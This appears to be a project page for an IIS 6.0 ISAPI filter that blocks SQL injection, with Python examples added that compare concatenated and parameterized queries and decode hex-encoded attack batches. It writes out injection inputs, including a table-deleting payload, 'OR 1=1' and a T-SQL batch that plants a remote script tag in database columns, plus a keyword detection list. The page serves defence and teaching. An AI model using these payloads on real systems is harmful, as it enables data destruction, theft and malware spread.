Project Description

This ISAPI wildcard, which works as an ISAPI filter, sanitizes SQL injection attacks directly in GET and POST variables.

Version 2.0 is available. It includes a configuration application that lets you enable logging and exclude files from being filtered. Logging lets you verify which attacks you are suffering.


This ISAPI DLL prevents SQL injection attempts by intercepting the HTTP requests and sanitizing both GET and POST variables (or any combination of both) before the request reaches the intended code. This is especially useful for legacy applications that were not designed to deal with MS SQL Server injection attempts. Though this application was designed with MS SQL Server in mind, it can be used with other database engines with no or minimal changes.

This ISAPI is only compatible with Internet Information Server (IIS) 6.0, which ships with Windows 2003. Windows XP uses the IIS 5 engine, which DOES NOT support ISAPI wildcards.


SQL Server injection is a common application attack that targets the application's database layer. Every application that builds SQL queries by string concatenation instead of using parameterized queries is vulnerable by nature, no exceptions. A basic example:

C#:
stringSQL = "SELECT * FROM users WHERE userName = '" + UserId.Text + "';";

Classic ASP:
stringSQL = "SELECT * FROM users WHERE userName = '" & Request("UserId") & "';"

If UserId is entered as '; DELETE TABLE xxxx; -- the SQL query sent to the database will be:

SELECT * FROM users WHERE userName = ''; DELETE TABLE xxxx; --';

This will delete table xxxx. Another category of attack concerns privacy. If UserId is entered as ' OR 1=1 -- the resulting SQL query will be:

SELECT * FROM users WHERE userName = '' OR 1=1 --';

This forces the return of all rows from table "users".
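The two queries above run end to end, as an added illustration that is not code from this project: Python with an in-memory SQLite table stands in for the Classic ASP page and the SQL Server "users" table, and the rows, function names and sample input are this example's own constructions. The concatenated version returns every row for the ' OR 1=1 -- input, while the parameterized version treats the same input as a literal user name and returns nothing:

```python
import sqlite3

# Constructed sample rows standing in for the page's "users" table.
SAMPLE_USERS = [("alice", "s3cret"), ("bob", "hunter2"), ("carol", "pa55w0rd")]


def make_db():
    """Create an in-memory database holding the constructed users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (userName TEXT, password TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def lookup_concatenated(conn, user_id):
    """The vulnerable pattern from the page: the request value is pasted into the SQL text."""
    sql = "SELECT * FROM users WHERE userName = '" + user_id + "';"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """The fix: the value is bound as a parameter and is never parsed as SQL."""
    sql = "SELECT * FROM users WHERE userName = ?;"
    return conn.execute(sql, (user_id,)).fetchall()


def demo():
    """Run both lookups with a normal name and with the ' OR 1=1 -- input; return row counts."""
    conn = make_db()
    tamper = "' OR 1=1 --"
    results = {
        "concatenated/alice": len(lookup_concatenated(conn, "alice")),
        "concatenated/tamper": len(lookup_concatenated(conn, tamper)),
        "parameterized/alice": len(lookup_parameterized(conn, "alice")),
        "parameterized/tamper": len(lookup_parameterized(conn, tamper)),
    }
    conn.close()
    return results


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows} row(s)")
```

A request filter such as the one described on this page is a compensating control placed in front of legacy code; the parameterized form is what actually removes the bug, because the database never sees the user's text as part of the statement.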

A more sophisticated attack uses an inline batch:

… = a few hundred chars that were not included (hex encoded values)

This translates to the following T-SQL batch (excerpt):
DECLARE @T varchar(255),@C varchar(255)
select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype='u' and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167)
OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C
exec('update ['+@T+'] set ['+@C+']=rtrim(convert(varchar,['+@C+']))+''<script src=http://www.211796*.net/f****}p.js></script>''')
CLOSE Table_Cursor

See more about this kind of attack here:

This category of attack has also been completely blocked by the filter since the first beta version.
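Hex-encoded batches like the one above are hard to spot in raw request logs because the SQL keywords are hidden inside a 0x... literal. As an added example that is not part of this project or its filter rules, the Python inspector below decodes T-SQL hex literals found in query-string parameters and reports the keywords that become visible afterwards; the keyword list, the parameter names and the sample request are all constructed for this example.

```python
import re
from urllib.parse import parse_qs

# Tokens an ordinary form value should never carry. This list is an assumption
# made for the example; it is not the ISAPI filter's actual rule set.
SUSPICIOUS = ("DECLARE", "EXEC", "CAST", "SYSOBJECTS", "SYSCOLUMNS", "UPDATE", "DELETE", "DROP")

# A T-SQL binary literal: 0x followed by an even number of hex digits.
HEX_LITERAL = re.compile(r"0[xX]((?:[0-9A-Fa-f]{2})+)")

# Constructed sample request: a stacked batch whose body hides "DELETE FROM users;"
# inside a hex literal. Semicolons are percent-encoded so parse_qs keeps the value whole.
SAMPLE_QUERY = (
    "id=5%3BDECLARE+%40S+VARCHAR(100)%3B"
    "SET+%40S%3DCAST(0x44454C4554452046524F4D2075736572733B+AS+VARCHAR(100))%3B"
    "EXEC(%40S)%3B--&page=2"
)


def decode_hex_literals(text):
    """Replace every 0x... literal in text with the characters it encodes."""
    def expand(match):
        raw = bytes.fromhex(match.group(1))
        # A literal cast to NVARCHAR arrives as UTF-16LE (every second byte is NUL);
        # anything else is treated as single-byte text.
        if len(raw) >= 2 and raw[1::2] == b"\x00" * (len(raw) // 2):
            return raw.decode("utf-16-le", errors="replace")
        return raw.decode("latin-1")
    return HEX_LITERAL.sub(expand, text)


def inspect_query_string(query_string):
    """Map each parameter name to the suspicious keywords seen after hex decoding."""
    findings = {}
    for name, values in parse_qs(query_string, keep_blank_values=True).items():
        for value in values:
            visible = decode_hex_literals(value).upper()
            hits = [tok for tok in SUSPICIOUS
                    if re.search(r"\b" + re.escape(tok) + r"\b", visible)]
            if hits:
                findings.setdefault(name, []).extend(hits)
    return findings


if __name__ == "__main__":
    for param, hits in inspect_query_string(SAMPLE_QUERY).items():
        print(f"{param}: {', '.join(hits)}")
```

Running the inspector over the constructed request reports DECLARE, EXEC and CAST from the plain text and DELETE only after the literal is decoded; a clean request such as id=5&page=2 reports nothing. The same decoding step is what a log-review script needs before grepping for keywords, since the hex body defeats a naive text match.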

By Rodney Viana

Download Installer
First Release

A video describing the step-by-step installation is available here: First Release

You can also see written instructions in this Discussion thread: Installation

A 64-bit beta version is released.

I need beta testers.

Last edited Nov 5, 2008 at 3:50 PM by rviana, version 19